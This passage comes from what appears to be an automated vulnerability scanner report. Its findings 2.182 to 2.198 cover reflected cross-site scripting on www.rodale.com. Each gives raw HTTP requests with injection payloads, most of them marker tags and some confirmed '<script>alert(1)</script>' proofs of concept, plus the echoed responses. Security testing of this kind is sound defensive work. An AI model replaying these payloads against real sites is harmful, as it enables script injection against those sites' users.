Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:35 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:36 GMT
Date: Thu, 10 Mar 2011 17:05:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=of5a857ajiill0f4bp1taa79m4; path=/; domain=.rodale.com
Content-Length: 42864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/natural-sleep-remedies?7af78"><script>alert(1)</script>0ece62a6df9=1&title=Get+a+Good+Night%E2%80%99s+Sleep+with+Skills%2C+Not+Pills">
...[SNIP]...

2.182. http://www.rodale.com/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /news

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1836f"><a>caf7a9d9ed0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news1836f"><a>caf7a9d9ed0 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:02 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:04 GMT
Date: Thu, 10 Mar 2011 17:06:04 GMT
Content-Length: 22432
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page news1836f"><a>caf7a9d9ed0 node node-958">
...[SNIP]...

2.183. http://www.rodale.com/news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /news

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7057e"><a>dd1d23aebcc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news?7057e"><a>dd1d23aebcc=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:05 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:07 GMT
Date: Thu, 10 Mar 2011 17:05:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/news?7057e"><a>dd1d23aebcc=1" title="Register" class="moreLink">
...[SNIP]...

2.184. http://www.rodale.com/our-board-advisors [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /our-board-advisors

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba43c"><a>691650629db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /our-board-advisorsba43c"><a>691650629db HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:45 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:47 GMT
Date: Thu, 10 Mar 2011 17:07:47 GMT
Content-Length: 22470
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page our-board-advisorsba43c"><a>691650629db node node-958">
...[SNIP]...

2.185. http://www.rodale.com/our-board-advisors [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /our-board-advisors

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ff3"><a>41e683e2082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /our-board-advisors?d4ff3"><a>41e683e2082=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:53 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:55 GMT
Date: Thu, 10 Mar 2011 17:06:55 GMT
Content-Length: 29887
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/our-board-advisors?d4ff3"><a>41e683e2082=1" title="Register" class="moreLink">
...[SNIP]...

2.186. http://www.rodale.com/our-site-policies [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /our-site-policies

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10e96"><a>b046c7db16b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /our-site-policies10e96"><a>b046c7db16b HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:59 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1799
Expires: Thu, 10 Mar 2011 17:38:01 GMT
Date: Thu, 10 Mar 2011 17:08:02 GMT
Content-Length: 22467
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page our-site-policies10e96"><a>b046c7db16b node node-958">
...[SNIP]...

2.187. http://www.rodale.com/our-site-policies [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /our-site-policies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 643a2"><a>a2b3e6c8fee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /our-site-policies?643a2"><a>a2b3e6c8fee=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:05 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:07 GMT
Date: Thu, 10 Mar 2011 17:07:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/our-site-policies?643a2"><a>a2b3e6c8fee=1" title="Register" class="moreLink">
...[SNIP]...

2.188. http://www.rodale.com/plastic-bag-ban [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /plastic-bag-ban

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4e09"><a>1960b2b02f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /plastic-bag-banc4e09"><a>1960b2b02f8 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:11 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:12 GMT
Date: Thu, 10 Mar 2011 17:06:12 GMT
Content-Length: 22461
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page plastic-bag-banc4e09"><a>1960b2b02f8 node node-958">
...[SNIP]...

2.189. http://www.rodale.com/plastic-bag-ban [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /plastic-bag-ban

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52f3b"><script>alert(1)</script>79010ebe967 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /plastic-bag-ban?52f3b"><script>alert(1)</script>79010ebe967=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:09 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:06:11 GMT
Date: Thu, 10 Mar 2011 17:06:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=f2kjnuqirscng4v1t45rk1utd5; path=/; domain=.rodale.com
Content-Length: 48864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/plastic-bag-ban?52f3b"><script>alert(1)</script>79010ebe967=1&title=You+Pay+%2488+a+Year+for+%22Free%22+Plastic+Bags">
...[SNIP]...

2.190. http://www.rodale.com/plastic-free [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /plastic-free

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c182"><a>fa0287626fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /plastic-free7c182"><a>fa0287626fe HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:15 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:17 GMT
Date: Thu, 10 Mar 2011 17:06:17 GMT
Content-Length: 22452
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page plastic-free7c182"><a>fa0287626fe node node-958">
...[SNIP]...

2.191. http://www.rodale.com/plastic-free [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /plastic-free

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe82"><script>alert(1)</script>fcfbf7dc765 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /plastic-free?ebe82"><script>alert(1)</script>fcfbf7dc765=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:13 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:06:15 GMT
Date: Thu, 10 Mar 2011 17:06:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=a2j7f8qi6tbk6nmhjq9ofih142; path=/; domain=.rodale.com
Content-Length: 80333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/plastic-free?ebe82"><script>alert(1)</script>fcfbf7dc765=1&title=Rodale.com%27s+Plastic-Free+February">
...[SNIP]...

2.192. http://www.rodale.com/point-view [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /point-view

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2017e"><a>82d9802df73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /point-view2017e"><a>82d9802df73 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:36 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:39 GMT
Date: Thu, 10 Mar 2011 17:07:39 GMT
Content-Length: 22446
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page point-view2017e"><a>82d9802df73 node node-958">
...[SNIP]...

2.193. http://www.rodale.com/point-view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /point-view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 892bb"><a>2a73396ccd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /point-view?892bb"><a>2a73396ccd3=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:45 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:48 GMT
Date: Thu, 10 Mar 2011 17:06:48 GMT
Content-Length: 31942
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/point-view?892bb"><a>2a73396ccd3=1" title="Register" class="moreLink">
...[SNIP]...

2.194. http://www.rodale.com/recipe_query_redirect.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /recipe_query_redirect.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f024"><a>c58bbd69a17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /recipe_query_redirect.php7f024"><a>c58bbd69a17 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:24 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:26 GMT
Date: Thu, 10 Mar 2011 17:07:26 GMT
Content-Length: 22491
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page recipe_query_redirect.php7f024"><a>c58bbd69a17 node node-958">
...[SNIP]...

2.195. http://www.rodale.com/rodale-story [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rodale-story

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e61d"><a>0326caecab4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rodale-story2e61d"><a>0326caecab4 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:15 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:18 GMT
Date: Thu, 10 Mar 2011 17:07:18 GMT
Content-Length: 22452
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page rodale-story2e61d"><a>0326caecab4 node node-958">
...[SNIP]...

2.196. http://www.rodale.com/rodale_coreg/post [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rodale_coreg/post

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c3b1"><a>7dab2ceffb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rodale_coreg6c3b1"><a>7dab2ceffb4/post HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:26 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:28 GMT
Date: Thu, 10 Mar 2011 17:07:28 GMT
Content-Length: 22503
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page rodale_coreg6c3b1"><a>7dab2ceffb4 rodale_coreg6c3b1">
...[SNIP]...

2.197. http://www.rodale.com/rodale_coreg/post [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rodale_coreg/post

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b06"><a>65815bf57c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rodale_coreg/post72b06"><a>65815bf57c9 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:59 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:38:01 GMT
Date: Thu, 10 Mar 2011 17:08:01 GMT
Content-Length: 22482
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page rodale_coreg rodale_coreg-post72b06"><a>65815bf57c9 node node-958">
...[SNIP]...

2.198. http://www.rodale.com/rodalecom-team [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /rodalecom-team

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31adc"><a>8a1440e7f35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rodalecom-team31adc"><a>8a1440e7f35 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:45 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:46 GMT
Date: Thu, 10 Mar 2011 17:07:46 GMT
Content-Length: 22458
Connection: close

